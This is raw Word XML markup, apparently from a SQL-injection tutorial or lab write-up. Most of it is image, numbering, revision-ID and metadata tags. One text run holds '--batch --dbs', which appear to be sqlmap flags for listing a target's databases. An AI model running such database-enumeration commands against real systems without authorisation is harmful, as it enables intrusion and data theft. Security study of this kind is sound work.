        <w:t> --batch --dbs  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F95886">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="4226560"/>
            <wp:effectExtent l="0" t="0" r="0" b="1016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5273040" cy="4226560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5908ECF3">
      <w:pPr>
        <w:pStyle w:val="4"/>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AA1D324"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AA1D3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6F4AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="576F4A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D00D7"/>
    <w:rsid w:val="0512669F"/>
    <w:rsid w:val="08C616D3"/>
    <w:rsid w:val="0958078A"/>
    <w:rsid w:val="0AEF0DDC"/>
    <w:rsid w:val="0B4E1B8B"/>
    <w:rsid w:val="0B84410E"/>
    <w:rsid w:val="103D7E98"/>
    <w:rsid w:val="11652C63"/>
    <w:rsid w:val="1292521C"/>
    <w:rsid w:val="13344EDC"/>
    <w:rsid w:val="13931798"/>
    <w:rsid w:val="13F871E9"/>
    <w:rsid w:val="148443FC"/>
    <w:rsid w:val="15BE1225"/>
    <w:rsid w:val="174E6388"/>
    <w:rsid w:val="191266CD"/>
    <w:rsid w:val="1C511779"/>
    <w:rsid w:val="1F841EC1"/>
    <w:rsid w:val="21494A03"/>
    <w:rsid w:val="21546861"/>
    <w:rsid w:val="21894CDA"/>
    <w:rsid w:val="24B85C79"/>
    <w:rsid w:val="24CA1507"/>
    <w:rsid w:val="2607591B"/>
    <w:rsid w:val="28BB402D"/>
    <w:rsid w:val="29711886"/>
    <w:rsid w:val="2B821C11"/>
    <w:rsid w:val="2D214FC0"/>
    <w:rsid w:val="30954A86"/>
    <w:rsid w:val="30BA2637"/>
    <w:rsid w:val="313C778B"/>
    <w:rsid w:val="330F2F66"/>
    <w:rsid w:val="334A2505"/>
    <w:rsid w:val="34B048AC"/>
    <w:rsid w:val="37E01F7D"/>
    <w:rsid w:val="390078DA"/>
    <w:rsid w:val="3A805D8E"/>
    <w:rsid w:val="3B3A381D"/>
    <w:rsid w:val="3BC268BC"/>
    <w:rsid w:val="3C9E05CE"/>
    <w:rsid w:val="404D5D77"/>
    <w:rsid w:val="439D37F0"/>
    <w:rsid w:val="46190E27"/>
    <w:rsid w:val="46794D72"/>
    <w:rsid w:val="49125B3D"/>
    <w:rsid w:val="492B154C"/>
    <w:rsid w:val="49961940"/>
    <w:rsid w:val="4AD978D5"/>
    <w:rsid w:val="4DDE00FE"/>
    <w:rsid w:val="4EFF09F2"/>
    <w:rsid w:val="512473D9"/>
    <w:rsid w:val="51BC06EC"/>
    <w:rsid w:val="531D273D"/>
    <w:rsid w:val="549411C4"/>
    <w:rsid w:val="56577DDA"/>
    <w:rsid w:val="569C7080"/>
    <w:rsid w:val="62774F17"/>
    <w:rsid w:val="66336607"/>
    <w:rsid w:val="66AF173A"/>
    <w:rsid w:val="68247009"/>
    <w:rsid w:val="6E586DB6"/>
    <w:rsid w:val="6E5D131B"/>
    <w:rsid w:val="73BE077C"/>
    <w:rsid w:val="741C3B1A"/>
    <w:rsid w:val="74377C4A"/>
    <w:rsid w:val="745E5F99"/>
    <w:rsid w:val="75BC0E83"/>
    <w:rsid w:val="77925C41"/>
    <w:rsid w:val="7DBC3788"/>
    <w:rsid w:val="7E284A8B"/>
    <w:rsid w:val="7F11162F"/>
    <w:rsid w:val="7F2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459</Words>
  <Characters>3321</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3790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2024-12-09T06:34:51Z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